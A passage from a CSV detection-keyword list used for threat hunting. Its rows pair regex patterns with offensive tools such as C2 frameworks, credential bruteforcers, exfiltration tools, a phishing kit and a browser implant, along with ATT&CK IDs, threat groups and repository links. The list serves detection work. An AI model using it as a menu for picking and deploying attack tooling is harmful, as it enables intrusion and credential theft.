It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","41315" "*docker build -t legba .*",".{0,1000}docker\sbuild\s\-t\slegba\s\..{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","41316" "*docker build -t maitm *",".{0,1000}docker\sbuild\s\-t\smaitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","41317" "*docker build -t merlin-agent:*-linux*",".{0,1000}docker\sbuild\s\-t\smerlin\-agent\:.{0,1000}\-linux.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","#linux","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","41318" "*docker build -t poshito*",".{0,1000}docker\sbuild\s\-t\sposhito.{0,1000}","offensive_tool_keyword","Poshito","Poshito is a Windows C2 over 
Telegram","T1102 - T1071.001 - T1571 - T1027","TA0011 - TA0005","N/A","N/A","C2","https://github.com/itaymigdal/Poshito","1","0","N/A","N/A","7","10","10","1","2024-10-30T10:40:41Z","2024-09-10T20:14:17Z","41319" "*docker build -t rmg .*",".{0,1000}docker\sbuild\s\-t\srmg\s\..{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser (rmg) is a Java RMI vulnerability scanner and can be used to identify and verify common security vulnerabilities on Java RMI endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","N/A","6","9","860","108","2024-07-03T19:40:54Z","2019-11-04T11:37:38Z","41320" "*docker images | grep cursed*",".{0,1000}docker\simages\s\|\sgrep\scursed.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","41322" "*docker ps -a | grep cursed*",".{0,1000}docker\sps\s\-a\s\|\sgrep\scursed.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","on forked repo","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","41323" "*docker pull egee/sgn*",".{0,1000}docker\spull\segee\/sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense
Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41324" "*docker rmi evilnginx*",".{0,1000}docker\srmi\sevilnginx.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","41326" "*docker rmi evilnovnc*",".{0,1000}docker\srmi\sevilnovnc.{0,1000}","offensive_tool_keyword","EvilnoVNC","EvilnoVNC is a Ready to go Phishing Platform","T1566 - T1110 - T1555 - T1204 - T1592","TA0001 - TA0006 - TA0009","N/A","N/A","Phishing","https://github.com/JoelGMSec/EvilnoVNC","1","0","N/A","N/A","9","10","960","169","2025-03-04T15:59:27Z","2022-09-04T10:48:49Z","41327" "*docker run */pacu:latest*",".{0,1000}docker\srun\s.{0,1000}\/pacu\:latest.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","Scattered Spider*","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","N/A","9","10","4651","731","2025-03-20T21:08:57Z","2018-06-13T21:58:59Z","41329" "*docker run */usr/src/rde1*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rde1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","41330" "*docker run */usr/src/rec2*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rec2.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor 
to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","N/A","10","10","39","6","2025-04-04T18:54:54Z","2023-09-25T20:29:08Z","41331" "*docker run -it egee/sgn*",".{0,1000}docker\srun\s\-it\segee\/sgn.{0,1000}","offensive_tool_keyword","sgn","polymorphic encoder used in to obfuscate payloads","T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/EgeBalci/sgn","1","0","N/A","N/A","8","10","1681","224","2024-02-22T17:35:59Z","2019-10-30T10:20:01Z","41334" "*docker run -it -p 1337:1337 -p 5000:5000 *",".{0,1000}docker\srun\s\-it\s\-p\s1337\:1337\s\-p\s5000\:5000\s.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - 
INDRIK SPIDER","Framework","https://github.com/BC-SECURITY/Empire","1","0","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","41335" "*docker run -it --rm local/pspy*",".{0,1000}docker\srun\s\-it\s\-\-rm\slocal\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","#linux","N/A","8","10","5370","538","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z","41336" "*docker run -it torat*",".{0,1000}docker\srun\s\-it\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","N/A","10","10","995","199","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z","41337" "*docker run -itd --name sish*",".{0,1000}docker\srun\s\-itd\s\-\-name\ssish.{0,1000}","offensive_tool_keyword","sish","An open source serveo/ngrok alternative. 
HTTP(S)/WS(S)/TCP Tunnels to localhost using only SSH","T1572 - T1090.002","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/antoniomika/sish","1","0","N/A","N/A","10","10","4203","325","2025-04-10T20:04:08Z","2019-02-15T15:36:23Z","41338" "*docker run legba*",".{0,1000}docker\srun\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","N/A","10","10","1577","93","2025-03-01T15:42:29Z","2023-10-23T15:44:06Z","41339" "*docker run -p * spring4shell",".{0,1000}docker\srun\s\-p\s.{0,1000}\sspring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","N/A","4","311","236","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z","41340" "*docker run --rm -ti maitm -*",".{0,1000}docker\srun\s\-\-rm\s\-ti\smaitm\s\-.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. 
This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","41341" "*docker run sitadel*",".{0,1000}docker\srun\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","41342" "*docker* donut *",".{0,1000}docker.{0,1000}\sdonut\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. 
A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1071.001 - T1059 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1562.001 - T1070 - T1105 - T1106 - T1027 - T1027.002 - T1057 - T1055 - T1620","TA0011 - TA0002 - TA0005 - TA0008 - TA0004 - TA0007 - TA0003 - TA0006 - TA0010","N/A","Indrik Spider","Exploitation tool","https://github.com/TheWover/donut","1","0","N/A","N/A","N/A","10","3882","667","2024-10-23T12:19:13Z","2019-03-27T23:24:44Z","41344" "*docker*/chaos-container:/temp/*",".{0,1000}docker.{0,1000}\/chaos\-container\:\/temp\/.{0,1000}","offensive_tool_keyword","chaos","CHAOS is a free and open-source Remote Administration Tool that allow generate binaries to control remote operating systems","T1105 - T1059 - T1021 - T1041 - T1569.002 - T1573","TA0002 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/tiagorlampert/CHAOS","1","0","N/A","N/A","10","10","2483","541","2024-10-26T18:02:45Z","2017-07-11T06:54:56Z","41345" "*docker*/hiphp:latest*",".{0,1000}docker.{0,1000}\/hiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","N/A","10","10","217","33","2025-04-19T07:05:12Z","2021-04-05T20:29:57Z","41346" "*docker/gsocket*",".{0,1000}docker\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. 
Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","N/A","9","10","1671","142","2025-04-22T14:47:29Z","2020-09-18T16:14:22Z","41347" "*docker-compose logs wiresocks*",".{0,1000}docker\-compose\slogs\swiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","N/A","9","3","287","30","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z","41348" "*docker-compose up cursedchrome*",".{0,1000}docker\-compose\sup\scursedchrome.{0,1000}","offensive_tool_keyword","CursedChrome","Chrome-extension implant that turns victim Chrome browsers into fully-functional HTTP proxies allowing you to browse sites as your victims","T1176 - T1219 - T1090","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/mandatoryprogrammer/CursedChrome","1","0","N/A","N/A","10","10","1533","226","2024-10-26T19:06:54Z","2020-04-26T20:55:05Z","41349" "*DockerPwn*",".{0,1000}DockerPwn.{0,1000}","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. 
","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","N/A","3","212","27","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z","41350" "*DocPlz-main.zip*",".{0,1000}DocPlz\-main\.zip.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","41351" "*docs.mythic-c2.net*",".{0,1000}docs\.mythic\-c2\.net.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","N/A","10","10","193","62","2025-04-16T14:12:16Z","2020-07-17T20:47:56Z","41352" "*docs.mythic-c2.net*",".{0,1000}docs\.mythic\-c2\.net.{0,1000}","offensive_tool_keyword","mythic","Thanatos is a Windows and Linux C2 agent written in rust.","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/thanatos","1","1","N/A","N/A","10","10","333","49","2024-12-19T19:07:03Z","2022-03-07T20:35:33Z","41353" "*DocsPLZ\DocsPLZ.*",".{0,1000}DocsPLZ\\DocsPLZ\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","N/A","10","2","145","30","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z","41354" "*docstring for bruteforce.*",".{0,1000}docstring\sfor\sbruteforce\..{0,1000}","offensive_tool_keyword","smartbrute","Password 
spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","N/A","10","4","365","54","2024-10-27T20:47:29Z","2021-07-16T14:53:29Z","41355" "*DoEvil()*",".{0,1000}DoEvil\(\).{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tool","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","41356" "*Do-Exfiltration.ps1*",".{0,1000}Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. 
Nishang is useful during all phases of penetration testing.","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","41357" "*Doge-Loader*xor.go*",".{0,1000}Doge\-Loader.{0,1000}xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","N/A","10","10","280","57","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z","41358" "*DoHC2*BeaconConnector*",".{0,1000}DoHC2.{0,1000}BeaconConnector.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41359" "*DoHC2.exe*",".{0,1000}DoHC2\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41360" "*DoHC2.py*",".{0,1000}DoHC2\.py.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41361" "*DoHC2Runner.*",".{0,1000}DoHC2Runner\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41362" "*DoHC2Runner.exe*",".{0,1000}DoHC2Runner\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41363" "*DoHC2Runner.pdb*",".{0,1000}DoHC2Runner\.pdb.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). 
This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41364" "*DoHChannel.cs*",".{0,1000}DoHChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","N/A","10","10","443","95","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z","41365" "*-Domain * -AllowDelegation *",".{0,1000}\-Domain\s.{0,1000}\s\-AllowDelegation\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41366" "*-Domain * -SPN *",".{0,1000}\-Domain\s.{0,1000}\s\-SPN\s.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER","Framework","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","10","7589","2850","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z","41367" "*Domain controller is missing* use --dc.*",".{0,1000}Domain\scontroller\sis\smissing.{0,1000}\suse\s\-\-dc\..{0,1000}","offensive_tool_keyword","SOAPHound","enumerate Active Directory environments via the Active Directory Web Services (ADWS)","T1018 - T1087.002 - T1649","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/FalconForceTeam/SOAPHound","1","0","#content","N/A","8","8","736","76","2024-02-03T08:52:49Z","2024-01-25T09:11:12Z","41368" "*Domain/CommandCollection*",".{0,1000}Domain\/CommandCollection.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for 
raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","41369" "*-domain_admins.txt*",".{0,1000}\-domain_admins\.txt.{0,1000}","offensive_tool_keyword","SilentHound","Quietly enumerate an Active Directory Domain via LDAP parsing users + admins + groups...","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/layer8secure/SilentHound","1","0","N/A","AD Enumeration","7","5","489","47","2023-01-23T20:41:55Z","2022-07-01T13:49:24Z","41370" "*domain_analyzer.py*",".{0,1000}domain_analyzer\.py.{0,1000}","offensive_tool_keyword","domain_analyzer","Analyze the security of any domain by finding all the information possible","T1560 